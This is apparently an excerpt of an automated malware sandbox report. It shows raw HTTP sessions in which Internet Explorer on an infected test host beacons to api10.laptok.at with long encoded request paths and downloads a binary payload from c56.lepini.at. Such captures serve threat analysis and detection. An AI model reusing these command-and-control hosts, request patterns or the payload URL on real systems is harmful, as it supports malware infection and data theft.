                                                                                                                                                    Nov 24, 2020 20:34:42.913803101 CET773INData Raw: 40 9a b4 c8 19 7d 97 f2 1b 22 01 ad f6 cf 7c 00 e7 e3 a3 80 02 14 90 b8 d6 79 18 72 9e e2 26 87 6f 0a b6 5d a6 6d 92 c6 88 c0 2d b9 19 f9 bf 1c 35 05 d4 dc 48 44 25 46 28 ff 63 84 ce 94 43 c2 20 4f 45 71 09 86 bd 7c c9 b8 c7 4f e0 4f e9 3d 0a 8c
                                                                                                                                                    Data Ascii: @}"|yr&o]m-5HD%F(cC OEq|OO=>|&J$XEL\*Q|-Xfu+&4_CsOM\9T'a'TnAxb>*p#|STx`xKW%^knX!YS$=EQ4^/


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.44973947.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2020 20:34:44.202896118 CET971OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 24, 2020 20:34:44.988176107 CET971INHTTP/1.1 404 Not Found
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 24 Nov 2020 19:34:44 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.44976547.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2020 20:35:27.597718000 CET6145OUTGET /api1/1uvbKU_2Bbc/ULu41miz1odgDS/0s31zFbFtyChQRUZdq4O6/uZoXvkdGnqZk3S6m/sjGRAy2VVHXHIWC/GbATokLhfRKxJIkWlf/rpIWzL8Zz/AoLyYIkQLp5Egmn3wei2/_2BYsLzf0AqH_2FfXyU/ERE14WKmMp42qnHDG4GKCW/dW1JtsfpRq1bQ/nxcOGVyd/44_2FNnM0ZUEbkxaxhi6GSR/lIHQEHFzka/2x7wIaFlGrWFy74sl/6cFqI7aHF8g5/CnaY7J6ktLq/m_0A_0DTO0929p/475exW0EBf88dYERW4hkW/yci4B7l977luXmG4/ieH0MCQdwnavDmP/zBg2fJ8N/s HTTP/1.1
                                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 24, 2020 20:35:28.619273901 CET6147INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 24 Nov 2020 19:35:28 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                    Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a 45 b6 83 40 14 44 17 c4 00 b7 21 ee 10 5c 66 10 dc dd 56 ff f3 4f e6 a1 a1 5f 57 dd 4b d2 dc 00 f6 4e f3 e3 e2 49 06 3f b5 1d 73 97 c5 05 11 f5 cd 87 bb 67 9f 88 a3 fc e7 2e 6c 0d 7a df 51 ed f9 40 a3 ad bb a7 9c 05 16 21 fc dc b4 49 71 8a 80 f6 13 4b 77 ef 04 6e 4f 99 1f b9 60 c3 2a 0f 8f 0d e8 13 83 7e 35 82 02 66 53 fd 49 32 d9 11 d9 a6 48 c3 f4 e6 d1 74 82 2f 36 3e e9 c1 a5 7f 1c 55 6d 9d d4 d9 a8 0b 8a 33 48 07 45 a3 5d 17 8e 61 6c 54 96 9d c9 51 4b 61 09 b6 e1 c1 59 27 ae 33 55 f7 a4 5e 6c 64 46 b0 89 21 4a fb a1 ef ae 7e 87 03 5a 16 85 e4 90 40 0b d5 a3 68 63 3a b3 a5 f3 ca bf 78 61 b6 f4 7a f4 6e 67 86 c0 e8 83 66 ca bd e1 d5 a3 05 75 f0 89 e7 ba 2e 87 15 ce d5 b5 d3 ee 89 4e 69 f0 8b 37 59 d5 b7 67 aa 80 52 9e 84 ed b5 2c 95 be d6 a9 3d 8d 3c 0a 4e 34 53 87 c6 81 dc 09 fa fc ae 01 51 45 36 7d 1c c5 8e 5a fa b5 9a af 03 36 33 f1 d9 f9 60 fa 5e 7c 77 35 03 07 30 9c 8a 1f 53 26 4e 73 9b 22 8f 85 7e 83 a2 11 91 5b 75 5f f9 3e bf df 4b 51 68 21 11 85 3a 9c 85 f4 cc 3e 37 c8 63 49 54 91 f1 9e 09 19 3f 45 70 10 ae 4f 84 95 cc f7 a6 03 32 71 54 d4 5f cf 88 81 64 4c 79 b9 b3 9c 98 b3 8e 0a fa 3a 88 aa bc f5 30 4a 63 88 c3 c8 d2 59 bf b7 da 8a 3d ae aa 0e e4 1b 6f 86 66 8b 40 28 c8 22 40 bb 08 c9 90 9f 00 c1 4a 00 c5 f6 19 c4 4c 7f 5b 61 e5 fb bc d6 28 7d ad 84 dd 42 1e f4 72 29 84 d7 da 67 0e 06 99 a0 8c 58 28 f2 1d 56 e0 67 db 4c e6 4d 93 6c ec cf 55 d9 80 15 da 5a ce f2 b5 f5 ad ed fe 0a 0f e5 93 e9 e4 a4 02 41 e1 e0 45 2f 3f 4f 3d 3a 22 b3 3d 83 76 50 b1 61 a9 bc d0 2c e5 52 fa db b4 55 01 68 09 03 d0 b1 db ee 92 3d 35 01 56 6f e5 1f 82 e4 75 df f4 5b 2e 91 e4 46 82 a3 bc bc 97 eb 21 ed e2 e3 f5 32 fe 6a e5 70 93 f5 f1 5d c1 8b e7 e2 3a 3c 69 41 d2 e7 67 ff a2 ea 8e 50 bb ae 2d 51 bd c6 e2 a8 8c 2d 6b 51 d8 4d 25 b6 70 a4 69 0b da 1f bf 5e 92 2c 3f 7a 65 48 4b 50 ed c4 ad 37 6f 6b 55 6b ca cc 03 02 34 4c 7c 9c a4 19 fa 14 f3 70 ac 64 9f 0f f9 cb 19 40 f8 e9 b4 90 16 ce 9e 61 9b 61 54 f9 38 db 21 bb ec 5c 2d 67 be 72 c6 e5 df 3a d4 c3 a0 e6 d7 c3 60 46 58 62 65 d2 b9 d1 ee f5 63 f6 40 2b 0d e1 04 65 59 c8 11 10 d4 63 a1 e3 17 eb 40 5a 61 22 a6 99 72 8f b4 02 b7 b2 ee ef 8c 62 dc c7 df 86 2e a3 9c 73 f9 1e 54 5e 8e 79 60 e5 8c c3 fb 3b fc 44 19 52 b3 d5 5e c4 eb fd c5 dc e3 98 70 fa b2 8c 4f 11 8b 47 e1 cd 77 73 aa f6 a5 5d cc f1 9b 00 40 c1 5f 0c ca 53 2d c8 89 15 6b 2e 06 0a 85 bb 6f 78 25 d3 ca 2e 64 01 50 11 96 4b b1 2e 36 8e 69 68 23 41 1f c2 26 2a 8a ac c3 e5 32 0c 91 b1 15 ff 2d 8f 98 19 df 83 72 ed 15 30 a9 9d 78 ae 4e f4 ea 26 75 0b 85 4b 44 0b 66 9f 33 52 dc 27 59 05 31 4d a7 e3 be 45 9d 1b 06 e5 64 a5 a4 02 86 55 9a 62 f4 95 26 bc 4d 20 3c e4 8f 0a dc f3 08 32 5d 17 b0 ee 22 73 c4 88 03 0e 21 17 8a 54 fa 90 ee 6a ba 1b 99 8e 89 65 20 05 96 d8 0d d6 a7 06 b6 88 a0 aa b2 6f ef 32 c4 b9 d9 31 ce ad f0 91 64 1d 56 a7 13 e8 ad 6b bf 7e 5b 69 13 ef d1 c8 b8 ab 95 1d d2 25 2c e8 b4 ca ac 93 c3 84 02 72 65 f0 01 5a 34 2a 09 f1 f5 40 d9 a0 81 1d b6 02 ab 97 0c da 33 5e 5a a1 22 7c 33 18 fc 50 05 45 93 2c 26 99 06 7f 2e c7 80 6e ad 23 20 af 51 3e 5b ca 79 aa 99 af af 9d dd 9c 88 4b 31 82 e6 d0 d6
                                                                                                                                                    Data Ascii: 2000E@D!\fVO_WKNI?sg.lzQ@!IqKwnO`*~5fSI2Ht/6>Um3HE]alTQKaY'3U^ldF!J~Z@hc:xazngfu.Ni7YgR,=<N4SQE6}Z63`^|w50S&Ns"~[u_>KQh!:>7cIT?EpO2qT_dLy:0JcY=of@("@JL[a(}Br)gX(VgLMlUZAE/?O=:"=vPa,RUh=5Vou[.F!2jp]:<iAgP-Q-kQM%pi^,?zeHKP7okUk4L|pd@aaT8!\-gr:`FXbec@+eYc@Za"rb.sT^y`;DR^pOGws]@_S-k.ox%.dPK.6ih#A&*2-r0xN&uKDf3R'Y1MEdUb&M <2]"s!Tje o21dVk~[i%,reZ4*@3^Z"|3PE,&.n# Q>[yK1
                                                                                                                                                    Nov 24, 2020 20:35:28.619333029 CET6148INData Raw: 71 ed f6 9e e1 c7 92 b7 3e 4c d2 7c 93 24 3c 31 d2 29 d7 41 95 d1 48 dd 6f 3b ad 6b cc df 29 35 ef 14 f8 52 8b aa 95 8d d9 86 cb dd 5b 87 53 8a ad 41 31 a6 ce ee 1e fb c4 09 46 5c 52 fd e5 f9 cf 16 5d eb 6b 8c 86 79 76 85 14 f5 28 8d 54 62 89 ac
                                                                                                                                                    Data Ascii: q>L|$<1)AHo;k)5R[SA1F\R]kyv(Tbu7r#d}G]%%'gX^OFyEW8mFD[wOa-dy\0R|x3"`Qui+NtMotc:rKOUfWHA^r_,LD
                                                                                                                                                    Nov 24, 2020 20:35:28.619370937 CET6149INData Raw: 2f 8b 5e 09 58 39 db 8d ae af 18 b2 b4 4c 02 09 65 b9 6c f6 0d 5e 0e 4a 2c 8f 09 3e bb e2 38 1e 10 bc 06 93 5c 70 50 d2 ea 9b d3 25 53 1d 9d 2e de 6e c7 35 1e 87 bb 7a 3b 3c c1 49 a9 8e 3d 25 83 20 dc e7 24 88 c8 4a bd 8d 64 a8 a2 b8 9b 92 99 cf
                                                                                                                                                    Data Ascii: /^X9Lel^J,>8\pP%S.n5z;<I=% $JdBm&=Z '533z<3DM;g%jGg-l7VsgEPNL}co=aV4XJ^rgBixBs"5
                                                                                                                                                    Nov 24, 2020 20:35:28.619410038 CET6151INData Raw: 32 c2 da ec a1 c8 81 7d 81 51 d8 43 9a 74 bb 83 22 89 d7 4c e7 f7 fd 99 00 99 66 71 d0 62 8c ca cb c2 17 a1 97 a8 fe b6 88 dc e8 fd eb ee 7a 5e 23 cc 17 cc 93 a9 ad ea 21 2a f2 0e 9d 36 9b 8d f1 9a 46 e3 85 22 28 28 5a 31 c3 4d bc ad ff 81 88 3c
                                                                                                                                                    Data Ascii: 2}QCt"Lfqbz^#!*6F"((Z1M<(~K(\,]3g\@!"5859.UUgg+>a#,oJmEXkc=4)U?%nX_;DT!'}p]sT^
                                                                                                                                                    Nov 24, 2020 20:35:28.619446039 CET6152INData Raw: d9 2e bb 36 00 db fd 13 9f 7d f1 b2 f6 c4 a2 14 53 1b 65 16 47 1a 18 85 f2 78 d7 83 0a 51 6b ff 4e 86 3c 5c 40 35 fc d2 e3 20 76 1c 72 4f c7 4d 83 d2 41 c4 cf 8c 7e b4 2f 0c 98 48 24 c5 11 26 fd 3a 1e 83 e3 27 2d 2e 54 fd dc 71 a8 1a 1e da 67 02
                                                                                                                                                    Data Ascii: .6}SeGxQkN<\@5 vrOMA~/H$&:'-.Tqgb'ED.G+w_3&x-[EUl~Sm\F&QreNzM_I..]|(={oht!'^da>oy_1k/J[Vo=
                                                                                                                                                    Nov 24, 2020 20:35:28.619493008 CET6153INData Raw: b5 08 d0 10 0e a7 85 2c e2 f2 ae ff 00 be 6a 29 94 96 12 af 20 35 03 0d 46 42 07 8e 3e f2 c2 6e 8f 61 7d 2a 17 45 57 81 1b d1 7b 1b 91 25 da a7 01 6b 61 02 bd ce 26 7c 87 06 8d fe e0 47 ee 0b 84 e9 61 b3 c9 5a 7d 9d f9 6d b5 93 7a f0 29 6e 7f c2
                                                                                                                                                    Data Ascii: ,j) 5FB>na}*EW{%ka&|GaZ}mz)n'eNp_\gOA%_5NdI$#v/H0sd(;O~h~Gnnq,QYlwSBfY,sZeDgDEe|*8r7-e*3kr`m}_$$
                                                                                                                                                    Nov 24, 2020 20:35:28.662935972 CET6155INData Raw: 7d 7d db f2 dc 27 20 b0 05 4e be 9e 7b 8f 40 8d 5e 43 1e 24 68 f7 72 c3 a8 d5 e2 55 44 09 b4 7c 02 ec 47 ea 95 51 88 bc dc 0d ca b7 79 68 a7 d5 ed db 0a c1 7e 6e cc d6 02 5a 47 cb b5 70 a4 d4 75 d9 9b 5b a5 40 c8 a5 fb 9f 3d eb e0 3c 98 6d b4 7f
                                                                                                                                                    Data Ascii: }}' N{@^C$hrUD|GQyh~nZGpu[@=<mh>Qz>~<!Jw6_]DwY%UZcTmXRCX+##gP&A4k]YD;&@b>>a_)
                                                                                                                                                    Nov 24, 2020 20:35:28.662992001 CET6156INData Raw: ff e1 3c f5 8f 9f cf eb 1d 09 d1 4e d1 39 13 0e 04 f7 7e ed af 08 f3 e9 ee 95 d3 cb ac c0 1c 1c ee 0a cd ab 36 00 89 1f d9 77 07 99 ea 3e 60 7d 4c 3e 73 a8 b6 5a 46 d0 0a e2 49 a0 be f2 e9 91 f5 0c fe e3 6c dd e9 d2 97 7b 9b 23 73 3f 8a 77 73 a5
                                                                                                                                                    Data Ascii: <N9~6w>`}L>sZFIl{#s?wsLOW.PhpU btV7t{?oVJ0/Yg:G-5e9o(YHPQW8 'PtO*qdl&{l+f\zz7S`?~"7?
                                                                                                                                                    Nov 24, 2020 20:35:28.663031101 CET6158INData Raw: cc 0b 9c f1 c5 95 d6 69 2e 70 79 3d cc 58 8f f0 92 3c d6 63 30 78 fc b4 3a 28 4b 41 98 e9 0f 04 8d ba f3 0d 4a ba 89 cd 29 30 0a 24 de 2d 4b 3b e3 0f 6f 2b 8e 42 83 38 2d 29 51 e3 f5 bd 42 e9 1f 01 d5 6f 4f b8 5c 00 21 37 60 d1 3f 0c 5b d7 cf 56
                                                                                                                                                    Data Ascii: i.py=X<c0x:(KAJ)0$-K;o+B8-)QBoO\!7`?[V@p?z!mMJie5>bXLCEJ!ZQq"?'V=GVJXxI@2!(<"EXK>&0H5RmTQ@cd[|aC9-grJ gezQ
                                                                                                                                                    Nov 24, 2020 20:35:28.663069010 CET6159INData Raw: d8 33 a9 61 a8 09 28 ad 2b d1 96 30 42 c9 00 24 9c df e5 6c dc 17 97 e9 37 cc 45 d4 1e 10 47 a4 96 7d a6 a4 36 94 0a cd 82 5f 3d b4 4a 62 00 87 03 75 cd b2 42 13 17 c7 c7 db ee 67 19 0e 8d 67 32 1b e8 a8 0f 4e 46 27 2f 60 77 50 29 55 57 40 c2 44
                                                                                                                                                    Data Ascii: 3a(+0B$l7EG}6_=JbuBgg2NF'/`wP)UW@D\,Py1EcR!#8ofxu9j&y"]2;[RA}yvuWz{gM{[Mb`@rg<i`P:Y>Uy7;{!j~X>xK>R-
                                                                                                                                                    Nov 24, 2020 20:35:28.891160011 CET6160INData Raw: 5c 57 d9 9d 9d ab fa ca 30 a7 19 68 12 fc 44 31 e8 06 46 69 6c 83 d5 29 66 32 2f 0b 35 7c 90 cf 07 00 fa ce d7 1e 9a 3e 59 43 c3 98 21 a8 ed 89 1a ef 56 d2 80 82 69 f8 0c 15 fb 52 b0 ab 7e 45 09 53 a5 e1 97 cc d0 e7 d2 72 da b9 82 5e 79 0b b9 68
                                                                                                                                                    Data Ascii: \W0hD1Fil)f2/5|>YC!ViR~ESr^yhZGm/^kAbI`;]5Clh11*Rc*m3.g\D=J4lO1M2S/gvRpaE[g#c?D;*]uSTCcRHb


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    3192.168.2.44976447.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2020 20:35:30.484663010 CET6413OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 24, 2020 20:35:31.301166058 CET6413INHTTP/1.1 404 Not Found
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 24 Nov 2020 19:35:31 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    4192.168.2.44976747.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2020 20:35:32.350853920 CET6415OUTGET /api1/tQTtTlNNyyTHp8mZxwj/87ufrUlrtp1usWYjjxq_2B/yAOH12_2F1IYJ/lKW5AYnq/_2BbaPBw_2BvxMvagxVqPyJ/jSUh2wAda1/gHbr670JVUq1KwK7N/6uxLXG5CHSWb/dgl5wFu8VM1/Rkwn44dvXkxcGr/6ai4evYmGZZapTEFZPM6t/l7dnGylpkoukj_2B/UIph5LMwbusYJYR/SgNVcjHjuu6gNQMV1u/yo8w_2BDc/tr29yULxa_2FW8vjKL1w/IkKYcWnRbp20t9pYrs_/0A_0DOoPdbEyCpXUb3P_2B/SP7qNsXNt82Vl/EBYqhcdo/ksN77WU_2Bu9u_2Bp6ImMCY/qmYYk7_2FYRubl/N HTTP/1.1
                                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Host: api10.laptok.at
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 24, 2020 20:35:33.336285114 CET6416INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 24 Nov 2020 19:35:33 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                    Data Raw: 37 34 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d d4 c5 91 85 00 00 44 c1 80 38 60 1f 3b e2 ee ce 0d 77 77 a2 df cd 60 aa de 54 17 39 a6 bf 1d fc 45 c4 ad c1 78 3a f9 8f 6a 67 1f 64 f9 66 90 e4 79 86 9a 61 8e a8 a9 8f 01 91 00 eb 9b 2d b4 18 13 10 47 fc 10 4c 70 24 9e d1 b5 ca af b2 26 d0 95 00 5c 5b 74 73 a0 be 17 b2 24 ee 2a 72 78 38 4a cf 87 38 7d 37 a1 47 dd 14 84 56 98 a6 cd d6 1d 52 e9 a4 7b 13 64 a7 3d de 19 9a bd 18 09 50 d9 8c 15 6b 43 8b 91 21 04 17 c2 d5 fb 96 1b e4 81 f6 05 39 58 62 e9 a7 4c 7b de 8f d2 89 1e 56 39 2e 94 20 42 8e ee f8 5a a6 0a 9e 8a 92 04 f3 e4 a0 3a 3a 5c 7b 5d 0e df 6b 60 f1 2c ef 20 8c aa 9a 50 e1 01 5f f5 24 9a 9b e9 e3 9a 32 01 1a f3 a7 84 7e 11 c3 22 ce 62 9e 4f 4c a2 01 b3 9f f4 d0 0f b5 7d 39 40 14 cc a6 f3 92 be 45 60 23 18 f7 94 b0 58 ec 4c 2a d7 b6 61 ff ad 21 ba 1a 61 14 f9 08 5a 4c 97 39 cd d8 8f e7 71 65 12 ee a5 43 53 02 eb 67 14 cc 06 9a 7b ae 12 f8 b8 96 a7 57 2e bb 02 4d a1 27 c4 e5 f9 37 93 57 5b 04 72 b8 f1 cb 1f a7 13 2b 5e c4 f8 ed 39 a9 42 01 fd 86 08 e9 0a a9 dd c3 2d 15 9d 7e a0 42 94 4e 8e 0a 24 3e 9a be 5f 35 4d 02 ac 79 03 82 c9 45 99 fc e9 67 fc 39 8e b3 2e 3a 65 db 3b 61 90 f7 59 39 16 f7 c8 7f 41 6d b8 6c 2b 2d 6c 8c 6e 90 06 6e 6c 78 e2 ce 34 3f 29 a9 83 9f 35 74 af cf 58 79 18 75 42 a0 70 cf 62 86 84 88 f7 60 9b ca a4 c7 db 5c ac 6c 40 cb d1 e1 37 8e ac 01 1b 24 b5 05 5c 43 3d 1b 17 18 96 31 2c 67 5b b9 84 0b 33 2f bf ce 7a 35 f3 0b 3b 3d 7a 3a 25 20 c6 8e 4a b9 63 c3 e3 7f 70 bf 4f 49 67 b9 de 92 cf 81 92 cb 0c 67 21 ee f5 56 2b ba 8f 73 e5 eb 07 c4 ec 81 24 aa dc 4e 98 94 a3 4a 47 4a 48 52 98 fc f2 97 9c db b5 c1 29 bd a1 0a 34 f4 73 0e 37 3f f6 73 90 a7 3e c4 48 9b d0 b6 c7 61 d2 82 40 36 01 a5 f9 13 f7 e0 66 70 02 06 0f 6f c8 b4 75 0a a8 c8 f7 52 e9 d0 c6 1c 23 78 8b 63 b0 5f 70 29 9a 8e a1 b1 0f 59 84 9c 97 0e 9d b4 56 95 00 74 01 8b 85 2a ce 1d c2 8c b9 93 9f 6b 47 e3 bc 2d 73 34 ba bf 08 5d 5a b7 bb 41 b7 b1 f2 1c e5 3a 23 e8 5c e7 eb 5f cd cc 6e 42 fb 9d a0 a1 2a e2 af ec 59 ec 0a 85 d0 14 66 20 82 61 5e 44 0f 4d 1a d2 c2 ea 34 df e0 34 27 fc 40 b9 05 49 6a 80 7c 41 f4 c6 fe 95 34 99 be e1 9b 36 e3 a4 ee e9 b9 59 c7 7a 5c f8 af e1 eb f9 40 1a d1 ad 61 dd 6c 58 a0 9e de de 29 bf d9 21 40 0b 27 10 3c 49 17 38 eb aa f8 98 2c 85 08 5f fc f2 75 55 6d d4 b8 bd 72 0b dc d2 f6 7d 47 26 06 1b 48 b7 90 17 bd 81 91 f5 cc 5b 5f 38 92 23 2f 00 57 a5 c0 d4 7e 2d 47 8e ad 72 54 2c 30 72 98 a8 de 34 7f 16 77 4e 4e cf 66 c1 a3 4f f9 ce d0 7a 85 21 96 84 1f 26 18 71 24 bf 0e d5 ed cf cd 3e 3f ea 60 f1 9e 1a dd b1 1b f2 ce 8c 09 ca fd d6 22 3e a2 f4 18 2d db c7 e3 b2 4f 30 cd b9 cf b6 7f 9b bc 01 8e 26 23 42 43 a9 d3 3a d9 f6 97 53 43 43 cc 42 0b e1 6b 0a 98 cd e6 8c 4d 96 c3 d7 fc 1a e4 f3 c8 49 88 cf 24 fb c6 b1 9b ca df 00 49 74 c5 f8 77 2f 08 c6 94 a9 b1 b2 60 d9 b3 78 ab dd 55 c3 8c 44 d7 76 7c 8d 7c 22 56 7c 75 18 cb b1 76 98 92 ab 13 c5 85 1c ff 14 28 85 4c 8d 74 ea a1 81 76 a9 06 09 2e 46 76 0e dd c2 f2 e0 1b 90 fd 55 24 aa 15 33 7f 15 b6 a6 23 cb 35 fe a0 05 ee 20 1a fb d1 37 d1 59 47 06 ef 64 52 1b 9c b3 4d b7 56 ae 4f f4 89 d6 68 43 9f 1c 7d f6 c3 1c 82 83 e1 32 b2 6c a3 c5 50 6a 62 9a e5 9c
                                                                                                                                                    Data Ascii: 740D8`;ww`T9Ex:jgdfya-GLp$&\[ts$*rx8J8}7GVR{d=PkC!9XbL{V9. BZ::\{]k`, P_$2~"bOL}9@E`#XL*a!aZL9qeCSg{W.M'7W[r+^9B-~BN$>_5MyEg9.:e;aY9Aml+-lnnlx4?)5tXyuBpb`\l@7$\C=1,g[3/z5;=z:% JcpOIgg!V+s$NJGJHR)4s7?s>Ha@6fpouR#xc_p)YVt*kG-s4]ZA:#\_nB*Yf a^DM44'@Ij|A46Yz\@alX)!@'<I8,_uUmr}G&H[_8#/W~-GrT,0r4wNNfOz!&q$>?`">-O0&#BC:SCCBkMI$Itw/`xUDv||"V|uv(Ltv.FvU$3#5 7YGdRMVOhC}2lPjb
                                                                                                                                                    Nov 24, 2020 20:35:33.336338997 CET6417INData Raw: ef 42 db 5f 1b 03 e6 e0 3b 81 9e ee b2 65 47 c2 35 9d 36 e8 bb 8a fb 23 34 8a 7f 27 f2 71 39 91 a4 44 ef 36 3d 98 73 0b af f1 16 43 99 99 b9 d0 da 63 5f b2 ee c8 9e 50 9c a4 b0 89 39 23 e6 3d aa 42 3e 52 7b 65 38 f2 aa d3 90 87 2a 7f 09 59 08 74
                                                                                                                                                    Data Ascii: B_;eG56#4'q9D6=sCc_P9#=B>R{e8*Yt%YoOX;&=hk'q;Ics;x|M.b2NP~F&(6xhBAi]Wi&!EotN4G`}js~("16ZRE@Dy[


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    5192.168.2.44977047.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2020 20:36:24.048608065 CET6439OUTGET /jvassets/xI/t64.dat HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Host: c56.lepini.at
                                                                                                                                                    Nov 24, 2020 20:36:24.714663982 CET6440INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 24 Nov 2020 19:36:24 GMT
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Content-Length: 138820
                                                                                                                                                    Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    ETag: "5db6b84e-21e44"
                                                                                                                                                    Accept-Ranges: bytes
